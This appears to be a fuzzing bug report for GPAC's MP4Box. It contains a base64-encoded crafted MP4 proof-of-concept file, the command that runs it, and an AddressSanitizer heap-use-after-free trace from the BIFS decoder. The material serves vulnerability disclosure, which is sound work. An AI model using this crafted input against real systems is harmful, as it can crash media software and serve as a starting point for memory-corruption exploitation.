zMzMzMzMzMzMzMzMzMzMzLzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzExMTExMTExMTExMTExMTExMTExMTExMTMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMy8zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMqszMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMymzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMxfAAAKnQAAAChzdHNjAAAA AAAAABAAAAABAAAADwAAAAEAAAAXAAAADAAAAAEAAABsc3RjbwAAAAAAAAAXAAA2/gAAzCUAAWSS AAIEswACm90AAzRvAAPNZAAEbHsABQbLAAWkHgAGP34ABuG3AAd3mAAIFTYAOXVMMjF3WldjMEwA CoORAAsnxAALwLEADF+4AAz3nQANlFsAAABAc3RzcwAAAAAAAAAMAAAAAQAAAB8AAAA9AAAAWwAA AHkAAACXAAAAtQAAANMAAADxAAABDwAAAS0AAAFLAAAJM3RyYWsAAABcdGtoZAAAAABInNlfSJzZ XwAAAAIAAAAAAB9PoAAAAAAAAAAAAAAAAAAAAAAAAQAdAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAA AAAAAEAAAAAAAAAAAAAAAAAAByVtZGlhAAAAIG1kaGQAAAAASJzZX0ic2V8AAV+QAB9PhgAAAAAA AAAhaGRscgAAAAAAAAAAaGludAAAAAAAAAAAAAAAAAAAAAbcbWluZgAAABxobWhkAAAAAAXABAQA A1mAAAMVywAAAAAAAAAkZGluZgAAABxkcmVmAAAA5wAAAAEAAAAMdXJsIAAAAAEAAAaUc3RibAAA ADRzdHNkAAAAAAAAAAEAAAAkcnRwIAAAAAAAAAABAAEAAQAABbQAAAAMdGltcwABX5AAAAAYc3R0 cwAAAAAAAAAAAAAAAAAAAAFWAAAAkwAAACAAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAA8AAAA PAAAADwAAABYAAAAeAAAADwAAAA8AAAAPAAAADwAAAAgAAAAIAAAACAAAAAgAAAAIAAAADwAAAA8 AAAAPAAAADwAAAA8AAAAPAAAADwAAAAgAAAAWAAAACAAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAA AAAgAAAAPAAAADwAAAA8AAAAWAAAAFgAAAA8AAAAPAAAADwAAAAgAAAAIAAAACAA////gAAAIAAA ADwAAAA8AAAAPAAAADwAAAA8AAAAPAAAADwAAAA8AAAAdAAAACAAAAAgAAAAIAAAACAAAAAgAAAA IAAAACAAAAAgAAAAIAAAACAAAAA8AAAAPAAAADwAAAA8AAAAPAAAAFgAAAA8AAAAPAAAADwAAAAg AAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAPAAAADwAAAA8AAAAdAAAADwAAAAgAAAAIAAAACAA AAAgAAAAIAAAACAAAAAgAADMzMzMzMzM7szMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMuczMzMzMzMzMzMzM68zMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzM7MzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzBHMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM s8zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzGQAzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMIAAAAMzMzMzMzMzM4szMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzDWGSw0FQz2prcLGEsWbTMmhAWD4yH8lSYCc10GGyaokqxxKLU9pbvFsT6OeHGZxdhMI 6HqElBciAlQhcIfV2210iBo31K3GKyiGC6Y8M1u8ahaE4jsXEMMN9QRG2zNK1syIGRyyZpbycQfa YPjMKdEZ36DD8hwtI+ES4mWFu8ABgMI278jOXAEnAQtb//+AAO/v7+/v7+/v7+/v7+/v7+/v8O/v 7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAACYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/+MAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAuAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA0rJXuzhGhTOYseF9zokq8wfhSgACAF+UigKfsL4pIlJVT///+HpgAsLJC5ZKqWT24B mHsqlMWq1K+tB8QAmkTpMWst/PLfoMPyHC0j4RLiZYW7wAGApDbvyM5cAScBC1vH0MeAAOAACQAA AAECAAQFAAAABwAAAAAAAQABAAEAAAAAAAAA4AAKAAAAAQIAEV8AAAAIAAAAAAABAAEAAgAAAAAA AABgAAsAAAABAgAFtAAAAAkAAOAADAAAAAECAAHHAAAACQAABbQAAQABAAIAAAAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgAAAAAGAADQAAAAECAAW0AAAACgAAAAAAAQABAAAA AADgAA4AAAABAgABowAAAAoAAAW0AAEAAQACAAAQAAAAAGAADxAAAAECAAW0AAAACwAAAAAAAQAB AAAAAADgABAAAAABAgAFVAAAAAsAAAW0AAESAQADAAAAAAAAHWAAEQAAAAECAAW0AAAADAAAAAAA AQABAAAAAABgABIAAAABAgAFtAAAAAwAAAW0AAGRASAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICDgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgIB8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAIgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg/yAgICAgICAgICAgICAgICAgICAgIAsgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICDMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMwAAAAAzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMwAAABkzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMwgICDMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMDMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzEPMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzczMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzBAQLN0vjAJ86nCLxbiv934OHu6SjG47B8ELADJqdIimDn8wAEwC ZIe2yLfTFC6L+9YhF5an8khK0aHaA1YGcLfqs8y4BBQKQSgPBuSqIXrIwAhDHJmnC48ktYyx4jt9 cACDsFM2VOEAtXMbUAt/Y2QCAsDGUHVgfwBABDBHcZTMEQ0rJXuzhGhTOYsehgZV009r+ADFpH6r EvwiF9zokq8wfhSgACAF+UigKfsL4pKAAAAA//+HpgAsLJC5ZKqWT24BmHsULov71iEXlqfySErR odoDVgZwt+qzzLgEFApBKA8G5KohesjACEMcmacLjyS1jLHiQH1wAIOwUzZU4QC1//9QC39jZAIC wMZQdWB/AEAEMEdxlMwRDSsle7OEaFM5ix6GBlXTT2v4Km3F16ood/+/yBDE8iI2ybzydDgLmhLU nKTEDk8HceAAQJCy0AAAAAAAAQII4AAAAAAAAAAAAAAAAAECCHAAAAAAAAAAAAAAAAABAgjQAAAA AAAAAAAAAAAAAQII8AAAAAAAAAAAAAAAAAECCPAiAAAAAAAAAAAA3gACAAEcAAAAEAAAAAAAAQAB AgABDgAAABEAAAAAAAEAAQIAARoAAAASAAAAAAABAAECAAEeAAAAEwAAAAAAAQABAgABHgAAABQA AAAAAAEAAQABIgAAAAAAAOEABAAAAAsBAgBQAAAAAAAAAAAAAAAAAQIIwABXI8YCZntjZiCI/Amg AACAXAAAEBfAcAAQRQABBmAAEFMAJJgAsIhx1oKKQ8T9JLeYAAIDgAAgTgACAEBVM4ADQABAEAFa UoCQ2gUlAw+p9XB4BA5Ch7zJRGmVnUdZhhxW+4a4Yn4AATGUAGBrjLkZhCYDFOi+ECbZLAAD95oh cCzqoS4MABjpeUiNSMSs///P5C1QgAAgG9d7YDSVxjwgFYpLsCilC2FJ9X4AAQHHyUs05YyB9KKG yd94DEXigEjyuWqvpp6qa6EIpxSmGKdVvb+/uwy+yABwWB0gKGVdWnR+vC9YTuUMPLz/4S+QCYwD GJGPYSRJgPpwvBQ8AQAAUCJAGgCOIGoC4g6oEgCHcR0uKW01uQj5DGJf/wlDAEAAFQiABgAjiBod 0HUHgYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJ iYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJ CCIAAIeqkOAAIIoAAh6AACGiggAEkADBCZtRCyCXfYCbYgOMN4jYXYPFbCGP9QNPgggCDAB2oYOU IqW7KJWxL/K9ORppaCBDcbgijqRBNlJ7AfAAIhIxn1v+FkXyGPgA8MFGIACIMoiHEmmpIFIKqoAm DFwAHwABAAMAeQWn7dQ8fAhSSdsZoCgB3pVwFVd5M75uAJ5zgiFh629FyD0YeEnUHnRbFu4gGbhF DH//CCHgAMmQ0AA6UX7AAoC9Jl4wRBSy2DFsJl1XHFYY/8A1OFf5gLR/AJvTIHGA2vIPfSMAAQHt L4ADjZiXwg1jAMQO0utAI1kn/e9NPI5GmlDHgH9eFMABGGQUhqTDUEC0FVEIIUAB4wIBCYYHvgAU TT9lpX++IEzAilOHKhezT5WTwx/un8EHAcFRhi0gpAgUIX4AQxf837BcSglcnwYIhhfElII4VVIN eeHBgMYBl8L+AHgAQAKBIgxDIrlaCG2qH1AAIFyLwABAAAGnoZk6PpF76CAIGHCLArKxCoMgxDub tePuxmAAgKZWNLYaZffhgLtJqpANLgSkAGAAxM2gEUbQMz/9/DYIP0Vr6xHu3//aAGcBVonoUYE2 EDrcGKETuyhwq54AIMvqLF6N5LOLYLq+gEHJ/CI3K8JmkVkA84AIYTtJJlJB1YWeKA4ZOsBFIeMA AIgMErJnJ4KwWggXlqiJG60AAIANwAGA4GyOFkMFtyUkAMTkiSGBb6GBcinMqfvoAIAc3AzllocA VahU4f9/QOH6ABVBsS54MI2H+WEQQh0YYxyMP/3+h+EqfgAIA0xCsmThAyJcAAYBRC5Rfs7IMbCz NL+D8CFVC+uelQ+jj7QcBTFYk36mL+GcLd/4OHAARBiiltZbNrlhbZWvTQwdERAQLN0vjAJ86nCL xbiv934OHu6SjG47B8ELICAgICAgICAgICAgICAgICAgICAgICAgF5an8khK0aHaA1YGcLfqs8y4 BBQKQSgPBuSqIXrIwAhDHJmnC48ktYyx4jt9cACDsFM2VOEAtXMbUAt/Y2QCAsDGUHVgfwBABDBH cZTMEQ0rJXuzhGhTOYsehgZV009r+ADFpH6rEvwiF9zokq8wfhSgACAF+UigKfsL4pKAAAAA//+H pgAsLJC5ZKqWT24BmHsqbcXXqih3/7/IEMTyIjbJvPJ0OAuaEtScpMQOTwdx4ABAkLLQAAAAAAAB AgjgAAAAAAAAAAAAAAAAAQIIcAAAABkAAAAAtX47bY1L3o6bqa8TVBwyjJicR+5OX83g6lmsCGu2 1TfjAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAOUBAXBwcHBw cHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBw cHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBw cHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBw cHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBw cHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBw cHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBw cHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcA== command: ./MP4Box -lsr poc Result ~/fuzzing/gpac/gpac-asan/bin/gcc/MP4Box -lsr poc [iso file] Unknown box type dCCf in parent minf [iso file] Missing DataInformationBox [iso file] extra box maxr found in hinf, deleting [iso file] Box "rtp " (start 9955) has 7 extra bytes [iso file] Box "stsd" (start 9939) has 5 extra bytes [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 853069 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] Unknown box type dCCf in parent minf [iso file] Missing DataInformationBox [iso file] extra box maxr found in hinf, deleting [iso file] Box "rtp " (start 9955) has 7 extra bytes [iso file] Box "stsd" (start 9939) has 5 extra bytes [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 853069 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 BIFS Scene Parsing [ODF] Reading bifs config: shift in sizes (not supported) [BIFS] name too long 1475 bytes but max size 1000, truncating ================================================================= ==3330624==ERROR: AddressSanitizer: heap-use-after-free on address 0x610000000494 at pc 0x7fa720afa77d bp 0x7fffca7618d0 sp 0x7fffca7618c8 READ of size 4 at 0x610000000494 thread T0 #0 0x7fa720afa77c in Q_IsTypeOn /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/unquantize.c:151:12 #1 0x7fa720afe187 in gf_bifs_dec_unquant_field /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/unquantize.c:397:7 #2 0x7fa720ab6d21 in gf_bifs_dec_sf_field /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/field_decode.c:84:7 #3 0x7fa720ac040e in gf_bifs_dec_field /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/field_decode.c:517:7 #4 0x7fa720ac137d in gf_bifs_dec_node_list /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/field_decode.c:618:7 #5 0x7fa720abcdb3 in gf_bifs_dec_node /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/field_decode.c:920:7 #6 0x7fa720a96880 in gf_bifs_dec_proto_list /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/com_dec.c:1143:12 #7 0x7fa720a98391 in BD_DecSceneReplace /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/com_dec.c:1351:6 #8 0x7fa720ad66b6 in BM_SceneReplace /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/memory_decoder.c:860:21 #9 0x7fa720ad6ff7 in BM_ParseCommand /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/memory_decoder.c:910:8 #10 0x7fa720ad76ee in gf_bifs_flush_command_list /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/memory_decoder.c:951:9 #11 0x7fa720a96969 in gf_bifs_dec_proto_list /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/com_dec.c:1162:5 #12 0x7fa720a96070 in gf_bifs_dec_proto_list /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/com_dec.c:1132:8 #13 0x7fa720a98391 in BD_DecSceneReplace /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/com_dec.c:1351:6 #14 0x7fa720ad66b6 in BM_SceneReplace /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/memory_decoder.c:860:21 #15 0x7fa720ad6ff7 in BM_ParseCommand /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/memory_decoder.c:910:8 #16 0x7fa720ad852e in gf_bifs_decode_command_list /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/memory_decoder.c:1019:6 #17 0x7fa72127c2df in gf_sm_load_run_isom /home/aidai/fuzzing/gpac/gpac-asan/src/scene_manager/loader_isom.c:303:10 #18 0x7fa7212000fe in gf_sm_load_run /home/aidai/fuzzing/gpac/gpac-asan/src/scene_manager/scene_manager.c:719:28 #19 0x51cdb8 in dump_isom_scene /home/aidai/fuzzing/gpac/gpac-asan/applications/mp4box/filedump.c:203:14 #20 0x5004b4 in mp4boxMain /home/aidai/fuzzing/gpac/gpac-asan/applications/mp4box/main.c:6146:7 #21 0x7fa71fdd50b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #22 0x429b7d in _start (/home/aidai/fuzzing/gpac/gpac-asan/bin/gcc/MP4Box+0x429b7d) 